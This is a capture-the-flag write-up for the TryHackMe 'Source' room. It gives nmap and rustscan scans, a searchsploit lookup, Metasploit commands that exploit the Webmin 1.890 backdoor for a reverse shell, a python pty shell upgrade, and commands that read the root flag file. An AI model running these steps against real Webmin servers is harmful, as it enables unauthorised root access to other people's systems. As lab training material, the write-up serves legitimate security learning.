Source WriteUp
This is my write ups for Source Room on Try Hack Me.
This room is a CTF type of room
I will try to go deep into the technical thing we do in this room.
Task 1 - Embark
Enum
- Start with create a
nmapfolder to store all thenmapscans
Perform nmap and rustscan
mkdir nmap
nmap -sC -sV -T4 -v -oN nmap/initial $IP
rustscan -a $IP -- -oN nmap/rustscan
Nmap and Rustscan result
## Nmap Scan Result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: A1C0C7566A3BAB69F9B75D26F6460270
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
## Rustscan Result
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
- Go over to
https://$IP:10000/to find a login page
- Try to search on
exploit-dbto see if there is any known vulnerabilities exist
searchsploit webmin 1.890
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasplo | linux/webapps/47330.rb
----------------------------------------------------------- ---------------------------------
- Try the
msfconsoleto run this exploit
msfconsole -q
search webmin backdoor
use 0
set rhosts $IP
set ssl true
set lhost $YOUR_IP
Foothold
which python
/usr/bin/python
- Look like the machine has
pythonwe can use it to upgrade the shell
python -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm
id
- Look like we are already
root
PrivEsc
- Get all the flags
Get all the flags
cat /home/dark/user.txt /root/root.txt
THM{REDACTED}
THM{REDACTED}